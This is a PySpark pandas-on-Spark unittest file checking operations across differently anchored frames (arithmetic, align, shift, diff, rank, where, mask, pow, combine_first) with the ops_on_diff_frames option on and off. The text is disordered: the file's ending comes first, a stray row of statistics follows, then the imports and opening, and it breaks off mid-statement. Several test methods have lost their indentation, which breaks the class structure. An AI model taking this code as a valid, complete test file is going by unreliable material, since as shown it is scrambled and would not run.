                self.assert_eq(psdf_l.sort_index(), pdf_l.sort_index())
                self.assert_eq(psdf_r.sort_index(), pdf_r.sort_index())
        # Series-with-Series and the mixed Series/DataFrame combinations.
        pser1 = pd.Series([7, 8, 9], index=[10, 11, 12])
        pser2 = pd.Series(["g", "h", "i"], index=[10, 20, 30])
        psser1 = ps.from_pandas(pser1)
        psser2 = ps.from_pandas(pser2)
        for join in ["outer", "inner", "left", "right"]:
            psser_l, psser_r = psser1.align(psser2, join=join)
            pser_l, pser_r = pser1.align(pser2, join=join)
            self.assert_eq(psser_l.sort_index(), pser_l.sort_index())
            self.assert_eq(psser_r.sort_index(), pser_r.sort_index())
            psdf_l, psser_r = psdf1.align(psser1, join=join, axis=0)
            pdf_l, pser_r = pdf1.align(pser1, join=join, axis=0)
            self.assert_eq(psdf_l.sort_index(), pdf_l.sort_index())
            self.assert_eq(psser_r.sort_index(), pser_r.sort_index())
            psser_l, psdf_r = psser1.align(psdf1, join=join)
            pser_l, pdf_r = pser1.align(pdf1, join=join)
            self.assert_eq(psser_l.sort_index(), pser_l.sort_index())
            self.assert_eq(psdf_r.sort_index(), pdf_r.sort_index())
        # multi-index columns
        pdf3 = pd.DataFrame(
            {("x", "a"): [4, 5, 6], ("y", "c"): ["d", "e", "f"]}, index=[10, 11, 12]
        )
        psdf3 = ps.from_pandas(pdf3)
        pser3 = pdf3[("y", "c")]
        psser3 = psdf3[("y", "c")]
        for join in ["outer", "inner", "left", "right"]:
            psdf_l, psdf_r = psdf1.align(psdf3, join=join, axis=0)
            pdf_l, pdf_r = pdf1.align(pdf3, join=join, axis=0)
            self.assert_eq(psdf_l.sort_index(), pdf_l.sort_index())
            self.assert_eq(psdf_r.sort_index(), pdf_r.sort_index())
            psser_l, psser_r = psser1.align(psser3, join=join)
            pser_l, pser_r = pser1.align(pser3, join=join)
            self.assert_eq(psser_l.sort_index(), pser_l.sort_index())
            self.assert_eq(psser_r.sort_index(), pser_r.sort_index())
            psdf_l, psser_r = psdf1.align(psser3, join=join, axis=0)
            pdf_l, pser_r = pdf1.align(pser3, join=join, axis=0)
            self.assert_eq(psdf_l.sort_index(), pdf_l.sort_index())
            self.assert_eq(psser_r.sort_index(), pser_r.sort_index())
            psser_l, psdf_r = psser3.align(psdf1, join=join)
            pser_l, pdf_r = pser3.align(pdf1, join=join)
            self.assert_eq(psser_l.sort_index(), pser_l.sort_index())
            self.assert_eq(psdf_r.sort_index(), pdf_r.sort_index())
        # Aligning frames with different column structures needs axis=0.
        self.assertRaises(ValueError, lambda: psdf1.align(psdf3, axis=None))
        self.assertRaises(ValueError, lambda: psdf1.align(psdf3, axis=1))
def test_pow_and_rpow(self):
pser = pd.Series([1, 2, np.nan])
psser = ps.from_pandas(pser)
pser_other = pd.Series([np.nan, 2, 3])
psser_other = ps.from_pandas(pser_other)
self.assert_eq(pser.pow(pser_other), psser.pow(psser_other).sort_index())
self.assert_eq(pser ** pser_other, (psser ** psser_other).sort_index())
self.assert_eq(pser.rpow(pser_other), psser.rpow(psser_other).sort_index())
    def test_shift(self):
        """shift() result filtered by a boolean mask from the same frame."""
        pdf = pd.DataFrame(
            {
                "Col1": [10, 20, 15, 30, 45],
                "Col2": [13, 23, 18, 33, 48],
                "Col3": [17, 27, 22, 37, 52],
            },
            index=np.random.rand(5),
        )
        psdf = ps.from_pandas(pdf)
        # pandas upcasts shifted ints to float; cast back for the comparison.
        self.assert_eq(
            pdf.shift().loc[pdf["Col1"] == 20].astype(int), psdf.shift().loc[psdf["Col1"] == 20]
        )
        self.assert_eq(
            pdf["Col2"].shift().loc[pdf["Col1"] == 20].astype(int),
            psdf["Col2"].shift().loc[psdf["Col1"] == 20],
        )
    def test_diff(self):
        """diff() result filtered by a boolean mask from the same frame."""
        pdf = pd.DataFrame(
            {
                "Col1": [10, 20, 15, 30, 45],
                "Col2": [13, 23, 18, 33, 48],
                "Col3": [17, 27, 22, 37, 52],
            },
            index=np.random.rand(5),
        )
        psdf = ps.from_pandas(pdf)
        # pandas upcasts diffed ints to float; cast back for the comparison.
        self.assert_eq(
            pdf.diff().loc[pdf["Col1"] == 20].astype(int), psdf.diff().loc[psdf["Col1"] == 20]
        )
        self.assert_eq(
            pdf["Col2"].diff().loc[pdf["Col1"] == 20].astype(int),
            psdf["Col2"].diff().loc[psdf["Col1"] == 20],
        )
    def test_rank(self):
        """rank() result filtered by a boolean mask from the same frame."""
        pdf = pd.DataFrame(
            {
                "Col1": [10, 20, 15, 30, 45],
                "Col2": [13, 23, 18, 33, 48],
                "Col3": [17, 27, 22, 37, 52],
            },
            index=np.random.rand(5),
        )
        psdf = ps.from_pandas(pdf)
        self.assert_eq(pdf.rank().loc[pdf["Col1"] == 20], psdf.rank().loc[psdf["Col1"] == 20])
        self.assert_eq(
            pdf["Col2"].rank().loc[pdf["Col1"] == 20], psdf["Col2"].rank().loc[psdf["Col1"] == 20]
        )
class OpsOnDiffFramesDisabledTest(PandasOnSparkTestCase, SQLTestUtils):
    """Checks that cross-frame operations raise when the option is disabled.

    Mirrors `OpsOnDiffFramesEnabledTest`, but with
    ``compute.ops_on_diff_frames`` turned off every combination of objects
    anchored to different frames must raise a ValueError.
    """

    @classmethod
    def setUpClass(cls):
        """Disable operations across different frames for this class."""
        super().setUpClass()
        set_option("compute.ops_on_diff_frames", False)
    @classmethod
    def tearDownClass(cls):
        """Restore the default option value."""
        reset_option("compute.ops_on_diff_frames")
        super().tearDownClass()
    @property
    def pdf1(self):
        # Fixture frame with a sparse index containing duplicates (9, 9, 9).
        return pd.DataFrame(
            {"a": [1, 2, 3, 4, 5, 6, 7, 8, 9], "b": [4, 5, 6, 3, 2, 1, 0, 0, 0]},
            index=[0, 1, 3, 5, 6, 8, 9, 9, 9],
        )
    @property
    def pdf2(self):
        # Fixture frame with a plain contiguous index.
        return pd.DataFrame(
            {"a": [9, 8, 7, 6, 5, 4, 3, 2, 1], "b": [0, 0, 0, 4, 5, 6, 1, 2, 3]},
            index=list(range(9)),
        )
    @property
    def psdf1(self):
        # pandas-on-Spark counterpart of pdf1 (a fresh anchor each access).
        return ps.from_pandas(self.pdf1)
    @property
    def psdf2(self):
        # pandas-on-Spark counterpart of pdf2 (a fresh anchor each access).
        return ps.from_pandas(self.pdf2)
    def test_arithmetic(self):
        """All cross-frame arithmetic must raise."""
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            self.psdf1.a - self.psdf2.b
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            self.psdf1.a - self.psdf2.a
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            self.psdf1["a"] - self.psdf2["a"]
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            self.psdf1 - self.psdf2
    def test_assignment(self):
        """Assigning a Series from another anchor must raise."""
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf = ps.from_pandas(self.pdf1)
            psdf["c"] = self.psdf1.a
    def test_frame_loc_setitem(self):
        """DataFrame.loc setitem involving another anchor must raise."""
        pdf = pd.DataFrame(
            [[1, 2], [4, 5], [7, 8]],
            index=["cobra", "viper", "sidewinder"],
            columns=["max_speed", "shield"],
        )
        psdf = ps.DataFrame(pdf)
        another_psdf = ps.DataFrame(pdf)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf.loc[["viper", "sidewinder"], ["shield"]] = another_psdf.max_speed
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf.loc[another_psdf.max_speed < 5, ["shield"]] = -psdf.max_speed
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf.loc[another_psdf.max_speed < 5, ["shield"]] = -another_psdf.max_speed
    def test_frame_iloc_setitem(self):
        """DataFrame.iloc setitem involving another anchor must raise."""
        pdf = pd.DataFrame(
            [[1, 2], [4, 5], [7, 8]],
            index=["cobra", "viper", "sidewinder"],
            columns=["max_speed", "shield"],
        )
        psdf = ps.DataFrame(pdf)
        another_psdf = ps.DataFrame(pdf)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf.iloc[[1, 2], [1]] = another_psdf.max_speed.iloc[[1, 2]]
    def test_series_loc_setitem(self):
        """Series.loc setitem involving another anchor must raise."""
        pser = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
        psser = ps.from_pandas(pser)
        pser_another = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
        psser_another = ps.from_pandas(pser_another)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psser.loc[psser % 2 == 1] = -psser_another
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psser.loc[psser_another % 2 == 1] = -psser
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psser.loc[psser_another % 2 == 1] = -psser_another
    def test_series_iloc_setitem(self):
        """Series.iloc setitem involving another anchor must raise."""
        pser = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
        psser = ps.from_pandas(pser)
        pser_another = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
        psser_another = ps.from_pandas(pser_another)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psser.iloc[[1]] = -psser_another.iloc[[1]]
    def test_where(self):
        """where with a condition from another anchor must raise."""
        pdf1 = pd.DataFrame({"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]})
        pdf2 = pd.DataFrame({"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]})
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf1.where(psdf2 > 100)
        pdf1 = pd.DataFrame({"A": [-1, -2, -3, -4, -5], "B": [-100, -200, -300, -400, -500]})
        pdf2 = pd.DataFrame({"A": [-10, -20, -30, -40, -50], "B": [-5, -4, -3, -2, -1]})
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf1.where(psdf2 < -250)
    def test_mask(self):
        """mask with a condition from another anchor must raise."""
        pdf1 = pd.DataFrame({"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]})
        pdf2 = pd.DataFrame({"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]})
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf1.mask(psdf2 < 100)
        pdf1 = pd.DataFrame({"A": [-1, -2, -3, -4, -5], "B": [-100, -200, -300, -400, -500]})
        pdf2 = pd.DataFrame({"A": [-10, -20, -30, -40, -50], "B": [-5, -4, -3, -2, -1]})
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf1.mask(psdf2 > -250)
    def test_align(self):
        """align with a frame from another anchor must raise."""
        pdf1 = pd.DataFrame({"a": [1, 2, 3], "b": ["a", "b", "c"]}, index=[10, 20, 30])
        pdf2 = pd.DataFrame({"a": [4, 5, 6], "c": ["d", "e", "f"]}, index=[10, 11, 12])
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf1.align(psdf2)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf1.align(psdf2, axis=0)
    def test_pow_and_rpow(self):
        """pow/**/rpow with a Series from another anchor must raise."""
        pser = pd.Series([1, 2, np.nan])
        psser = ps.from_pandas(pser)
        pser_other = pd.Series([np.nan, 2, 3])
        psser_other = ps.from_pandas(pser_other)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psser.pow(psser_other)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psser ** psser_other
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psser.rpow(psser_other)
    def test_combine_first(self):
        """combine_first across anchors must raise (TypeError for frame/series mix)."""
        pdf1 = pd.DataFrame({"A": [None, 0], "B": [4, None]})
        psdf1 = ps.from_pandas(pdf1)
        self.assertRaises(TypeError, lambda: psdf1.combine_first(ps.Series([1, 2])))
        pser1 = pd.Series({"falcon": 330.0, "eagle": 160.0})
        pser2 = pd.Series({"falcon": 345.0, "eagle": 200.0, "duck": 30.0})
        psser1 = ps.from_pandas(pser1)
        psser2 = ps.from_pandas(pser2)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psser1.combine_first(psser2)
        pdf1 = pd.DataFrame({"A": [None, 0], "B": [4, None]})
        psdf1 = ps.from_pandas(pdf1)
        pdf2 = pd.DataFrame({"C": [3, 3], "B": [1, 1]})
        psdf2 = ps.from_pandas(pdf2)
        with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
            psdf1.combine_first(psdf2)
if __name__ == "__main__":
    # Re-import so test discovery picks up the classes under their canonical path.
    from pyspark.pandas.tests.test_ops_on_diff_frames import *  # noqa: F401
    try:
        # Prefer XML output (for CI report collection) when xmlrunner is available.
        import xmlrunner  # type: ignore[import]
        testRunner = xmlrunner.XMLTestRunner(output="target/test-reports", verbosity=2)
    except ImportError:
        testRunner = None
    unittest.main(testRunner=testRunner, verbosity=2)
| 38.4333 | 100 | 0.534997 |
from distutils.version import LooseVersion
from itertools import product
import unittest
import pandas as pd
import numpy as np
from pyspark import pandas as ps
from pyspark.pandas.config import set_option, reset_option
from pyspark.pandas.frame import DataFrame
from pyspark.testing.pandasutils import PandasOnSparkTestCase
from pyspark.testing.sqlutils import SQLTestUtils
from pyspark.pandas.typedef.typehints import (
extension_dtypes,
extension_dtypes_available,
extension_float_dtypes_available,
extension_object_dtypes_available,
)
class OpsOnDiffFramesEnabledTest(PandasOnSparkTestCase, SQLTestUtils):
    @classmethod
    def setUpClass(cls):
        """Enable arithmetic between objects backed by different anchors for this suite."""
        super().setUpClass()
        set_option("compute.ops_on_diff_frames", True)

    @classmethod
    def tearDownClass(cls):
        """Restore the default (disabled) option so other suites are unaffected."""
        reset_option("compute.ops_on_diff_frames")
        super().tearDownClass()
    @property
    def pdf1(self):
        """Frame with columns a/b on a sparse, non-contiguous index."""
        return pd.DataFrame(
            {"a": [1, 2, 3, 4, 5, 6, 7, 8, 9], "b": [4, 5, 6, 3, 2, 1, 0, 0, 0]},
            index=[0, 1, 3, 5, 6, 8, 9, 10, 11],
        )

    @property
    def pdf2(self):
        """Same columns as ``pdf1`` but on a dense 0..8 index (partial overlap with pdf1)."""
        return pd.DataFrame(
            {"a": [9, 8, 7, 6, 5, 4, 3, 2, 1], "b": [0, 0, 0, 4, 5, 6, 1, 2, 3]},
            index=list(range(9)),
        )

    @property
    def pdf3(self):
        """Frame sharing only column ``b`` with pdf1/pdf2; all-ones values."""
        return pd.DataFrame(
            {"b": [1, 1, 1, 1, 1, 1, 1, 1, 1], "c": [1, 1, 1, 1, 1, 1, 1, 1, 1]},
            index=list(range(9)),
        )

    @property
    def pdf4(self):
        """Frame with columns disjoint from pdf1/pdf2; all-twos values."""
        return pd.DataFrame(
            {"e": [2, 2, 2, 2, 2, 2, 2, 2, 2], "f": [2, 2, 2, 2, 2, 2, 2, 2, 2]},
            index=list(range(9)),
        )

    @property
    def pdf5(self):
        """Frame indexed by the (a, b) MultiIndex, leaving a single column ``c``."""
        return pd.DataFrame(
            {
                "a": [1, 2, 3, 4, 5, 6, 7, 8, 9],
                "b": [4, 5, 6, 3, 2, 1, 0, 0, 0],
                "c": [4, 5, 6, 3, 2, 1, 0, 0, 0],
            },
            index=[0, 1, 3, 5, 6, 8, 9, 10, 11],
        ).set_index(["a", "b"])

    @property
    def pdf6(self):
        """(a, b)-MultiIndexed frame with columns c/e; partially overlaps pdf5's index."""
        return pd.DataFrame(
            {
                "a": [9, 8, 7, 6, 5, 4, 3, 2, 1],
                "b": [0, 0, 0, 4, 5, 6, 1, 2, 3],
                "c": [9, 8, 7, 6, 5, 4, 3, 2, 1],
                "e": [4, 5, 6, 3, 2, 1, 0, 0, 0],
            },
            index=list(range(9)),
        ).set_index(["a", "b"])
    @property
    def pser1(self):
        """MultiIndexed Series (animal, attribute) with 8 entries; overlaps pser2 partially."""
        midx = pd.MultiIndex(
            [["lama", "cow", "falcon", "koala"], ["speed", "weight", "length", "power"]],
            [[0, 3, 1, 1, 1, 2, 2, 2], [0, 2, 0, 3, 2, 0, 1, 3]],
        )
        return pd.Series([45, 200, 1.2, 30, 250, 1.5, 320, 1], index=midx)

    @property
    def pser2(self):
        """MultiIndexed Series with 9 entries, including negatives, overlapping pser1."""
        midx = pd.MultiIndex(
            [["lama", "cow", "falcon"], ["speed", "weight", "length"]],
            [[0, 0, 0, 1, 1, 1, 2, 2, 2], [0, 1, 2, 0, 1, 2, 0, 1, 2]],
        )
        return pd.Series([-45, 200, -1.2, 30, -250, 1.5, 320, 1, -0.3], index=midx)

    @property
    def pser3(self):
        """MultiIndexed Series whose first level ("koalas") differs from pser1/pser2."""
        midx = pd.MultiIndex(
            [["koalas", "cow", "falcon"], ["speed", "weight", "length"]],
            [[0, 0, 0, 1, 1, 1, 2, 2, 2], [1, 1, 2, 0, 0, 2, 2, 2, 1]],
        )
        return pd.Series([45, 200, 1.2, 30, 250, 1.5, 320, 1, 0.3], index=midx)
    # pandas-on-Spark counterparts of the pandas fixtures above. Each property
    # returns a FRESH conversion, so every access yields a distinct anchor —
    # exactly what these "ops on different frames" tests need.
    @property
    def psdf1(self):
        """pandas-on-Spark version of ``pdf1``."""
        return ps.from_pandas(self.pdf1)

    @property
    def psdf2(self):
        """pandas-on-Spark version of ``pdf2``."""
        return ps.from_pandas(self.pdf2)

    @property
    def psdf3(self):
        """pandas-on-Spark version of ``pdf3``."""
        return ps.from_pandas(self.pdf3)

    @property
    def psdf4(self):
        """pandas-on-Spark version of ``pdf4``."""
        return ps.from_pandas(self.pdf4)

    @property
    def psdf5(self):
        """pandas-on-Spark version of ``pdf5``."""
        return ps.from_pandas(self.pdf5)

    @property
    def psdf6(self):
        """pandas-on-Spark version of ``pdf6``."""
        return ps.from_pandas(self.pdf6)

    @property
    def psser1(self):
        """pandas-on-Spark version of ``pser1``."""
        return ps.from_pandas(self.pser1)

    @property
    def psser2(self):
        """pandas-on-Spark version of ``pser2``."""
        return ps.from_pandas(self.pser2)

    @property
    def psser3(self):
        """pandas-on-Spark version of ``pser3``."""
        return ps.from_pandas(self.pser3)
def test_ranges(self):
self.assert_eq(
(ps.range(10) + ps.range(10)).sort_index(),
(
ps.DataFrame({"id": list(range(10))}) + ps.DataFrame({"id": list(range(10))})
).sort_index(),
)
def test_no_matched_index(self):
with self.assertRaisesRegex(ValueError, "Index names must be exactly matched"):
ps.DataFrame({"a": [1, 2, 3]}).set_index("a") + ps.DataFrame(
{"b": [1, 2, 3]}
).set_index("b")
    def test_arithmetic(self):
        """Frame and Series arithmetic across anchors with plain (non-extension) dtypes."""
        self._test_arithmetic_frame(self.pdf1, self.pdf2, check_extension=False)
        self._test_arithmetic_series(self.pser1, self.pser2, check_extension=False)
    @unittest.skipIf(not extension_dtypes_available, "pandas extension dtypes are not available")
    def test_arithmetic_extension_dtypes(self):
        """Same arithmetic checks using pandas nullable ``Int64`` extension dtype."""
        self._test_arithmetic_frame(
            self.pdf1.astype("Int64"), self.pdf2.astype("Int64"), check_extension=True
        )
        # The Series fixtures contain floats; cast through int first so the
        # Int64 conversion is valid.
        self._test_arithmetic_series(
            self.pser1.astype(int).astype("Int64"),
            self.pser2.astype(int).astype("Int64"),
            check_extension=True,
        )
    @unittest.skipIf(
        not extension_float_dtypes_available, "pandas extension float dtypes are not available"
    )
    def test_arithmetic_extension_float_dtypes(self):
        """Same arithmetic checks using pandas nullable ``Float64`` extension dtype."""
        self._test_arithmetic_frame(
            self.pdf1.astype("Float64"), self.pdf2.astype("Float64"), check_extension=True
        )
        self._test_arithmetic_series(
            self.pser1.astype("Float64"), self.pser2.astype("Float64"), check_extension=True
        )
    def _test_arithmetic_frame(self, pdf1, pdf2, *, check_extension):
        """Compare frame/column arithmetic between two anchors against pandas.

        When ``check_extension`` is set, results are compared non-exactly on
        pandas 1.1–1.2.1 and additionally asserted to keep an extension dtype.
        """
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)

        def assert_eq(actual, expected):
            # On pandas [1.1, 1.2.2) extension-dtype results are compared
            # loosely and the dtype itself is verified; elsewhere exact compare.
            if LooseVersion("1.1") <= LooseVersion(pd.__version__) < LooseVersion("1.2.2"):
                self.assert_eq(actual, expected, check_exact=not check_extension)
                if check_extension:
                    if isinstance(actual, DataFrame):
                        for dtype in actual.dtypes:
                            self.assertTrue(isinstance(dtype, extension_dtypes))
                    else:
                        self.assertTrue(isinstance(actual.dtype, extension_dtypes))
            else:
                self.assert_eq(actual, expected)

        assert_eq((psdf1.a - psdf2.b).sort_index(), (pdf1.a - pdf2.b).sort_index())
        assert_eq((psdf1.a * psdf2.a).sort_index(), (pdf1.a * pdf2.a).sort_index())
        # True division produces floats; without extension float dtypes the
        # result cannot stay an extension dtype, so skip the dtype check.
        if check_extension and not extension_float_dtypes_available:
            self.assert_eq(
                (psdf1["a"] / psdf2["a"]).sort_index(), (pdf1["a"] / pdf2["a"]).sort_index()
            )
        else:
            assert_eq((psdf1["a"] / psdf2["a"]).sort_index(), (pdf1["a"] / pdf2["a"]).sort_index())
        assert_eq((psdf1 + psdf2).sort_index(), (pdf1 + pdf2).sort_index())

        # Repeat the column-level checks with MultiIndex columns.
        columns = pd.MultiIndex.from_tuples([("x", "a"), ("x", "b")])
        psdf1.columns = columns
        psdf2.columns = columns
        pdf1.columns = columns
        pdf2.columns = columns
        assert_eq(
            (psdf1[("x", "a")] - psdf2[("x", "b")]).sort_index(),
            (pdf1[("x", "a")] - pdf2[("x", "b")]).sort_index(),
        )
        assert_eq(
            (psdf1[("x", "a")] - psdf2["x"]["b"]).sort_index(),
            (pdf1[("x", "a")] - pdf2["x"]["b"]).sort_index(),
        )
        assert_eq(
            (psdf1["x"]["a"] - psdf2[("x", "b")]).sort_index(),
            (pdf1["x"]["a"] - pdf2[("x", "b")]).sort_index(),
        )
        assert_eq((psdf1 + psdf2).sort_index(), (pdf1 + pdf2).sort_index())
    def _test_arithmetic_series(self, pser1, pser2, *, check_extension):
        """Compare Series arithmetic between two anchors against pandas.

        Mirrors ``_test_arithmetic_frame``'s extension-dtype comparison rules.
        """
        psser1 = ps.from_pandas(pser1)
        psser2 = ps.from_pandas(pser2)

        def assert_eq(actual, expected):
            # Loose compare + dtype check on pandas [1.1, 1.2.2) for extension
            # dtypes; exact compare otherwise.
            if LooseVersion("1.1") <= LooseVersion(pd.__version__) < LooseVersion("1.2.2"):
                self.assert_eq(actual, expected, check_exact=not check_extension)
                if check_extension:
                    self.assertTrue(isinstance(actual.dtype, extension_dtypes))
            else:
                self.assert_eq(actual, expected)

        assert_eq((psser1 + psser2).sort_index(), (pser1 + pser2).sort_index())
        assert_eq((psser1 - psser2).sort_index(), (pser1 - pser2).sort_index())
        assert_eq((psser1 * psser2).sort_index(), (pser1 * pser2).sort_index())
        # Division yields floats; skip the extension-dtype check when no
        # extension float dtype exists to hold the result.
        if check_extension and not extension_float_dtypes_available:
            self.assert_eq((psser1 / psser2).sort_index(), (pser1 / pser2).sort_index())
        else:
            assert_eq((psser1 / psser2).sort_index(), (pser1 / pser2).sort_index())
    def test_arithmetic_chain(self):
        """Chained arithmetic across three different anchors, plain dtypes."""
        self._test_arithmetic_chain_frame(self.pdf1, self.pdf2, self.pdf3, check_extension=False)
        self._test_arithmetic_chain_series(
            self.pser1, self.pser2, self.pser3, check_extension=False
        )
    @unittest.skipIf(not extension_dtypes_available, "pandas extension dtypes are not available")
    def test_arithmetic_chain_extension_dtypes(self):
        """Chained arithmetic with nullable ``Int64`` extension dtypes."""
        self._test_arithmetic_chain_frame(
            self.pdf1.astype("Int64"),
            self.pdf2.astype("Int64"),
            self.pdf3.astype("Int64"),
            check_extension=True,
        )
        # Cast float fixtures through int so Int64 conversion is valid.
        self._test_arithmetic_chain_series(
            self.pser1.astype(int).astype("Int64"),
            self.pser2.astype(int).astype("Int64"),
            self.pser3.astype(int).astype("Int64"),
            check_extension=True,
        )
    @unittest.skipIf(
        not extension_float_dtypes_available, "pandas extension float dtypes are not available"
    )
    def test_arithmetic_chain_extension_float_dtypes(self):
        """Chained arithmetic with nullable ``Float64`` extension dtypes."""
        self._test_arithmetic_chain_frame(
            self.pdf1.astype("Float64"),
            self.pdf2.astype("Float64"),
            self.pdf3.astype("Float64"),
            check_extension=True,
        )
        self._test_arithmetic_chain_series(
            self.pser1.astype("Float64"),
            self.pser2.astype("Float64"),
            self.pser3.astype("Float64"),
            check_extension=True,
        )
    def _test_arithmetic_chain_frame(self, pdf1, pdf2, pdf3, *, check_extension):
        """Chained frame arithmetic across three anchors, compared against pandas.

        Only columns present in all three frames can keep an extension dtype in
        the combined result; others fall back, which ``assert_eq`` accounts for.
        """
        psdf1 = ps.from_pandas(pdf1)
        psdf2 = ps.from_pandas(pdf2)
        psdf3 = ps.from_pandas(pdf3)
        common_columns = set(psdf1.columns).intersection(psdf2.columns).intersection(psdf3.columns)

        def assert_eq(actual, expected):
            # Loose compare on pandas [1.1, 1.2.2) for extension dtypes; in
            # that window also check the dtype of every common column.
            if LooseVersion("1.1") <= LooseVersion(pd.__version__) < LooseVersion("1.2.2"):
                self.assert_eq(actual, expected, check_exact=not check_extension)
                if check_extension:
                    if isinstance(actual, DataFrame):
                        for column, dtype in zip(actual.columns, actual.dtypes):
                            if column in common_columns:
                                self.assertTrue(isinstance(dtype, extension_dtypes))
                            else:
                                self.assertFalse(isinstance(dtype, extension_dtypes))
                    else:
                        self.assertTrue(isinstance(actual.dtype, extension_dtypes))
            else:
                self.assert_eq(actual, expected)

        assert_eq(
            (psdf1.a - psdf2.b - psdf3.c).sort_index(), (pdf1.a - pdf2.b - pdf3.c).sort_index()
        )
        assert_eq(
            (psdf1.a * (psdf2.a * psdf3.c)).sort_index(), (pdf1.a * (pdf2.a * pdf3.c)).sort_index()
        )
        # Division produces floats; skip the dtype check when extension float
        # dtypes are unavailable.
        if check_extension and not extension_float_dtypes_available:
            self.assert_eq(
                (psdf1["a"] / psdf2["a"] / psdf3["c"]).sort_index(),
                (pdf1["a"] / pdf2["a"] / pdf3["c"]).sort_index(),
            )
        else:
            assert_eq(
                (psdf1["a"] / psdf2["a"] / psdf3["c"]).sort_index(),
                (pdf1["a"] / pdf2["a"] / pdf3["c"]).sort_index(),
            )
        # pandas [1.0, 1.1) needs an approximate whole-frame comparison here.
        if check_extension and (
            LooseVersion("1.0") <= LooseVersion(pd.__version__) < LooseVersion("1.1")
        ):
            self.assert_eq(
                (psdf1 + psdf2 - psdf3).sort_index(), (pdf1 + pdf2 - pdf3).sort_index(), almost=True
            )
        else:
            assert_eq((psdf1 + psdf2 - psdf3).sort_index(), (pdf1 + pdf2 - pdf3).sort_index())

        # Repeat with MultiIndex columns; pdf3 deliberately shares only ("x", "b").
        columns = pd.MultiIndex.from_tuples([("x", "a"), ("x", "b")])
        psdf1.columns = columns
        psdf2.columns = columns
        pdf1.columns = columns
        pdf2.columns = columns
        columns = pd.MultiIndex.from_tuples([("x", "b"), ("y", "c")])
        psdf3.columns = columns
        pdf3.columns = columns
        common_columns = set(psdf1.columns).intersection(psdf2.columns).intersection(psdf3.columns)
        assert_eq(
            (psdf1[("x", "a")] - psdf2[("x", "b")] - psdf3[("y", "c")]).sort_index(),
            (pdf1[("x", "a")] - pdf2[("x", "b")] - pdf3[("y", "c")]).sort_index(),
        )
        assert_eq(
            (psdf1[("x", "a")] * (psdf2[("x", "b")] * psdf3[("y", "c")])).sort_index(),
            (pdf1[("x", "a")] * (pdf2[("x", "b")] * pdf3[("y", "c")])).sort_index(),
        )
        if check_extension and (
            LooseVersion("1.0") <= LooseVersion(pd.__version__) < LooseVersion("1.1")
        ):
            self.assert_eq(
                (psdf1 + psdf2 - psdf3).sort_index(), (pdf1 + pdf2 - pdf3).sort_index(), almost=True
            )
        else:
            assert_eq((psdf1 + psdf2 - psdf3).sort_index(), (pdf1 + pdf2 - pdf3).sort_index())
    def _test_arithmetic_chain_series(self, pser1, pser2, pser3, *, check_extension):
        """Chained Series arithmetic across three anchors, compared against pandas."""
        psser1 = ps.from_pandas(pser1)
        psser2 = ps.from_pandas(pser2)
        psser3 = ps.from_pandas(pser3)

        def assert_eq(actual, expected):
            # Loose compare + dtype check on pandas [1.1, 1.2.2) for extension
            # dtypes; exact compare otherwise.
            if LooseVersion("1.1") <= LooseVersion(pd.__version__) < LooseVersion("1.2.2"):
                self.assert_eq(actual, expected, check_exact=not check_extension)
                if check_extension:
                    self.assertTrue(isinstance(actual.dtype, extension_dtypes))
            else:
                self.assert_eq(actual, expected)

        assert_eq((psser1 + psser2 - psser3).sort_index(), (pser1 + pser2 - pser3).sort_index())
        assert_eq((psser1 * psser2 * psser3).sort_index(), (pser1 * pser2 * pser3).sort_index())
        if check_extension and not extension_float_dtypes_available:
            if LooseVersion(pd.__version__) >= LooseVersion("1.0"):
                self.assert_eq(
                    (psser1 - psser2 / psser3).sort_index(), (pser1 - pser2 / pser3).sort_index()
                )
            else:
                # Old pandas disagrees with pandas-on-Spark here, so the
                # expected result is spelled out explicitly.
                expected = pd.Series(
